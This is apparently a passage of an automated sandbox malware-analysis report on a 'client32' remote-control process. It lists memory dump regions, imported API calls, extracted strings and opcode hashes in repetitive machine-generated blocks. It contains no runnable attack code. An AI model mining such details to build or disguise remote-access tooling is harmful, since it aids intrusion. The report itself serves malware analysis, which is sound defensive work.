                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CombineCreateDeleteObjectRect$Indirect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3044651595-0
                                                                                                                        • Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                        • Instruction ID: 27b6d86d25d7e193214482d66684a995ae6d2575b2198652133f57a3d860c4fb
                                                                                                                        • Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                        • Instruction Fuzzy Hash: 26116031A50702AFE721CE64D888B9AF7ECFB45716F00812EE66992180C770B881CB93
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?), ref: 685968AE
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 685968C3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                        • String ID: ERROR$RESULT$a3Zh
                                                                                                                        • API String ID: 3168844106-3825894136
                                                                                                                        • Opcode ID: 35029747a46a9ee2479f6ad2e1d203fb93af36277bda8b5f2991eb5d8fa06773
                                                                                                                        • Instruction ID: 77f40fa9d6f47367eedfe846d93fcb3e4fcd229525ce85f6bb5fc339e4230a2f
                                                                                                                        • Opcode Fuzzy Hash: 35029747a46a9ee2479f6ad2e1d203fb93af36277bda8b5f2991eb5d8fa06773
                                                                                                                        • Instruction Fuzzy Hash: 540145B7E003417BEF109AA49C41AAF77D89B85198FC50039EE49C7201F735DE4883E6
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 685B6D0A
                                                                                                                          • Part of subcall function 685B6F64: __getptd_noexit.LIBCMT ref: 685B6F67
                                                                                                                          • Part of subcall function 685B6F64: __amsg_exit.LIBCMT ref: 685B6F74
                                                                                                                        • __getptd.LIBCMT ref: 685B6D21
                                                                                                                        • __amsg_exit.LIBCMT ref: 685B6D2F
                                                                                                                        • __lock.LIBCMT ref: 685B6D3F
                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 685B6D53
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 938513278-0
                                                                                                                        • Opcode ID: a93aa59c01d722b4e6f5b75a734e5dfcf7e3a47b28967ae788154e076abfac4e
                                                                                                                        • Instruction ID: 298479c68ac2489ba342f32c4400c877fbc963dd56d1f96824bb4e54f2cb8b21
                                                                                                                        • Opcode Fuzzy Hash: a93aa59c01d722b4e6f5b75a734e5dfcf7e3a47b28967ae788154e076abfac4e
                                                                                                                        • Instruction Fuzzy Hash: FCF0E93BD09750DFDB11AFB884217AE37E0AFA0728FD18589EA14A72C0DB344D00CE56
                                                                                                                        APIs
                                                                                                                        • PostMessageA.USER32(00010480,00000501,00000000,00000000), ref: 11057461
                                                                                                                        Strings
                                                                                                                        • Warning. DoNotify(%d) not processed, xrefs: 1105835B
                                                                                                                        • Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d, xrefs: 110574EA
                                                                                                                        • Unable to select/accept connection within 10sec, ignoring cmd %d, xrefs: 1105747B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • String ID: Unable to select/accept connection within 10sec, ignoring cmd %d$Warning. DoNotify(%d) not processed$Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d
                                                                                                                        • API String ID: 410705778-2398254728
                                                                                                                        • Opcode ID: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
                                                                                                                        • Instruction ID: 05798701b428304c80057879d977071bcb7a017165537b33727636eef533cf84
                                                                                                                        • Opcode Fuzzy Hash: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
                                                                                                                        • Instruction Fuzzy Hash: 6DD10975E0064A9BDB94CF95D880BAEF7B5FB84328F5082BEDD1557380EB356940CBA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 110DC630: EnterCriticalSection.KERNEL32(111E9064,11018545,7E4636A2,?,?,?,1117A7A8,000000FF), ref: 110DC631
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                        • std::exception::exception.LIBCMT ref: 1101B426
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1101B441
                                                                                                                          • Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A
                                                                                                                        Strings
                                                                                                                        • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B399
                                                                                                                        • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B3BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterException@8SectionThrowXinvalid_argument_memsetstd::_std::exception::exceptionwsprintf
                                                                                                                        • String ID: NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                                                        • API String ID: 2637870501-623348194
                                                                                                                        • Opcode ID: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
                                                                                                                        • Instruction ID: 57dd9297704c65ab0c6bcb40d8263c5768676fb733a16b5b2db7577f0494a42a
                                                                                                                        • Opcode Fuzzy Hash: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
                                                                                                                        • Instruction Fuzzy Hash: B87181B5D00359DFEB10CFA4C884BDDFBB4AF05318F248159D825AB381EB75AA84CB91
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$VisibleWindow
                                                                                                                        • String ID: %d,%d,%d,%d,%d,%d
                                                                                                                        • API String ID: 1671172596-1913222166
                                                                                                                        • Opcode ID: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
                                                                                                                        • Instruction ID: 343a7c5902a362ececb8f7ca127abed5b4c5d2d50e5eb0de1d2da9fabf51934b
                                                                                                                        • Opcode Fuzzy Hash: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
                                                                                                                        • Instruction Fuzzy Hash: 17519C74B00215AFD710CB68CC80FAAB7F9AF88704F508698E6599B281CB70ED45CBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 685A0EEB
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685A0F00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: 0f]h$PIN
                                                                                                                        • API String ID: 1338273076-3806878828
                                                                                                                        • Opcode ID: 446f466d8c433402f09cf39f2b9662d4cfc65eecf081cfbca28036be0520b431
                                                                                                                        • Instruction ID: 45494024bb7867e78a988d09fd7cfb8004f9f5ab1d3f059bc36bb13d9efef99d
                                                                                                                        • Opcode Fuzzy Hash: 446f466d8c433402f09cf39f2b9662d4cfc65eecf081cfbca28036be0520b431
                                                                                                                        • Instruction Fuzzy Hash: DC411AB5D00248AFDF40DFE8D8809EEBBB5FB49314F90452EE82AAB240E7355A44CB51
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID: DATA$a3Zh
                                                                                                                        • API String ID: 269201875-18189924
                                                                                                                        • Opcode ID: 4a4c2b1570c556f6a3c70ef61a71d1a1fedd2c538428b3331bab13621986c37b
                                                                                                                        • Instruction ID: 7191b5f6d7004659755abcc9f3dd958e82d5dfec587540a4aff1bb519174af18
                                                                                                                        • Opcode Fuzzy Hash: 4a4c2b1570c556f6a3c70ef61a71d1a1fedd2c538428b3331bab13621986c37b
                                                                                                                        • Instruction Fuzzy Hash: 3C31C1B5D00249ABDB01CFA88C41BBF77F99F84224F844169E829E7200FB349F4587E6
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68596D0A
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68596D72
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                        • API String ID: 190572456-1434219782
                                                                                                                        • Opcode ID: 0de84fd5cfabcaf65b75a9b3a1955609caa3ce294a12053ada02aed7332bcc88
                                                                                                                        • Instruction ID: af023c81277b3062dffda0f7edad90cbb74ec68688eb967c73d4b99bdf3c7005
                                                                                                                        • Opcode Fuzzy Hash: 0de84fd5cfabcaf65b75a9b3a1955609caa3ce294a12053ada02aed7332bcc88
                                                                                                                        • Instruction Fuzzy Hash: 103114769002A99FDF21DF68CCD0AD9B7F8EF59304B5148E9EA98D7200D270A9C9CF50
                                                                                                                        APIs
                                                                                                                        • #16.WSOCK32(?,?,?,00000000), ref: 685A79F1
                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 685A7A16
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: hbuf->data$httputil.c
                                                                                                                        • API String ID: 1452528299-2732665889
                                                                                                                        • Opcode ID: 68eeef271c13f91a11cd490788b14e3e652c06f812793a568613f29565b02d05
                                                                                                                        • Instruction ID: c89c1fab6a6fde405766de50f3342970425994b1f305379af91505ee79badcdd
                                                                                                                        • Opcode Fuzzy Hash: 68eeef271c13f91a11cd490788b14e3e652c06f812793a568613f29565b02d05
                                                                                                                        • Instruction Fuzzy Hash: DB21447A600B019FD320CE29DC80E6BB7F6EFD5655B54C82ED8EA97645D731F8018B50
                                                                                                                        APIs
                                                                                                                        • _strtok.LIBCMT ref: 110393B2
                                                                                                                          • Part of subcall function 1115F7E6: __getptd.LIBCMT ref: 1115F804
                                                                                                                        • _strtok.LIBCMT ref: 11039433
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
                                                                                                                        • String ID: ; >$CLTCONN.CPP
                                                                                                                        • API String ID: 3120919156-788487980
                                                                                                                        • Opcode ID: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
                                                                                                                        • Instruction ID: 48fd02c5cc66f23834ff9d805c81fd3cb0a4cfabe792bc6ab9c015f56f8a8e7f
                                                                                                                        • Opcode Fuzzy Hash: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
                                                                                                                        • Instruction Fuzzy Hash: 4821E775F1425B6BD701CEA58C40F9AB6D49F85359F0440A5FE08DB380FAB4AD0183D2
                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32(7E4636A2,00000000,?,7E4636A2,1118736B,000000FF,?,11066188,NSMWClass,7E4636A2,?,1106DC18), ref: 110311AA
                                                                                                                        • __strdup.LIBCMT ref: 110311F5
                                                                                                                          • Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,7E4636A2,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                          • Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                          • Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                          • Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
